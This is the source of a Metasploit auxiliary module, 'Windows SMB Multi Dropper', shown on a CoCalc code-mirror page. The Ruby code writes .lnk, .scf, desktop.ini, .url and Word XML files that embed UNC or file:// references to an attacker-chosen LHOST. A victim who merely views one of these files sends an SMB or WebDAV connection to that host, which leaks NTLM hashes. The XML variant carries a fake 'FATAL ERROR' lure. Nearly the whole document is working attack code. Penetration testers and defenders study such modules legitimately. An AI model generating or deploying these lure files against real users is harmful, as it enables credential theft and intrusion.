CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/fileformat/multidrop.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
class MetasploitModule < Msf::Auxiliary

8
  include Msf::Exploit::FILEFORMAT

9


10
  def initialize(info={})

11
    super( update_info( info,

12
        'Name'          => 'Windows SMB Multi Dropper',

13
        'Description'   => %q{

14
          This module dependent on the given filename extension creates either

15
          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference

16
          to the specified remote host, causing SMB connections to be initiated

17
          from any user that views the file.

18
        },

19
        'License'       => MSF_LICENSE,

20
        'Author'        =>

21
            [

22
              'Richard Davy - secureyourit.co.uk',  #Module written by Richard Davy

23
              'Lnk Creation Code by Mubix',         #Lnk Creation Code written by Mubix

24
              'asoto-r7'                            #Word XML creation code

25
            ],

26
        'Platform'      => [ 'win' ],

27
        'References'    =>

28
        [

29
          ['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],

30
          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],

31
          ['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],

32
        ]

33


34
      ))

35
    register_options(

36
      [

37
        OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),

38
        OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini", "word.lnk"]),

39
      ])

40
  end

41


42
  def run

43
    if datastore['FILENAME'].chars.last(3).join=="lnk"

44
        createlnk

45
    elsif datastore['FILENAME'].chars.last(3).join=="scf"

46
        createscf

47
    elsif datastore['FILENAME']=="desktop.ini"

48
        create_desktopini

49
    elsif datastore['FILENAME'].chars.last(3).join=="url"

50
        create_url

51
    elsif datastore['FILENAME'].chars.last(3).join=="xml"

52
        create_xml

53
    else

54
        fail_with(Failure::BadConfig,"Invalid FILENAME option")

55
    end

56
  end

57


58
  def createlnk

59
    #Code below taken from module droplnk.rb written by Mubix

60
    lnk = ""

61
    lnk << "\x4c\x00\x00\x00"                  #Header size

62
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  #Link CLSID

63
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"

64
    lnk << "\xdb\x00\x00\x00"                  #Link flags

65
    lnk << "\x20\x00\x00\x00"                  #File attributes

66
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  #Creation time

67
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  #Access time

68
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  #Write time

69
    lnk << "\x00\x00\x00\x00"                  #File size

70
    lnk << "\x00\x00\x00\x00"                  #Icon index

71
    lnk << "\x01\x00\x00\x00"                  #Show command

72
    lnk << "\x00\x00"                          #Hotkey

73
    lnk << "\x00\x00"                          #Reserved

74
    lnk << "\x00\x00\x00\x00"                  #Reserved

75
    lnk << "\x00\x00\x00\x00"                  #Reserved

76
    lnk << "\x7b\x00"                          #IDListSize

77
    #sIDList

78
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"

79
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"

80
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"

81
    lnk << "C:\\"

82
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

83
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"

84
    lnk << "\x00"

85
    lnk << "AUTOEXEC.BAT"

86
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"

87
    lnk << "\x5b\x15\x14\x00\x00\x00"

88
    lnk << Rex::Text.to_unicode("AUTOEXEC.BAT")

89
    lnk << "\x00\x00\x1c\x00\x00\x00"

90
    #sLinkInfo

91
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"

92
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"

93
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"

94
    lnk << "\x00\x00\x00"

95
    lnk << "C:\\AUTOEXEC.BAT"

96
    lnk << "\x00\x00\x0e\x00"

97
    #RELATIVE_PATH

98
    lnk << Rex::Text.to_unicode(".\\AUTOEXEC.BAT")

99
    lnk << "\x03\x00"

100
    #WORKING_DIR

101
    lnk << Rex::Text.to_unicode("C:\\")

102
    #ICON LOCATION

103
    lnk << "\x1c\x00"

104
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\icon.ico")

105
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"

106
    lnk << "computer"

107
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

108
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

109
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

110
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

111
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

112


113
    file_create(lnk)

114
  end

115


116
  def createscf

117
    scf=""

118
    scf << "[Shell]\n"

119
    scf << "Command=2\n"

120
    scf << "IconFile=\\\\#{datastore['LHOST']}\\test.ico\n"

121
    scf << "[Taskbar]\n"

122
    scf << "Command=ToggleDesktop"

123


124
    file_create(scf)

125
  end

126


127
  def create_desktopini

128
    ini=""

129
    ini << "[.ShellClassInfo]\n"

130
    ini << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"

131
    ini << "IconIndex=1337"

132


133
    file_create(ini)

134
  end

135


136
  def create_url

137
    url=""

138
    url << "[InternetShortcut]\n"

139
    url << "URL=file://#{datastore['LHOST']}/url.html\n"

140
    url << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"

141


142
    file_create(url)

143
  end

144


145
  def create_xml

146
    xml=""

147
    xml << "<?xml version='1.0' encoding='utf-8' ?>"

148
    xml << "<?mso-application progid='Word.Document'?>"

149
    xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"

150
    xml << "<Text>"

151
    xml << " FATAL ERROR: The document failed to render properly."

152
    xml << "</Text>"

153


154
    file_create(xml)

155
  end

156


157
end

158


159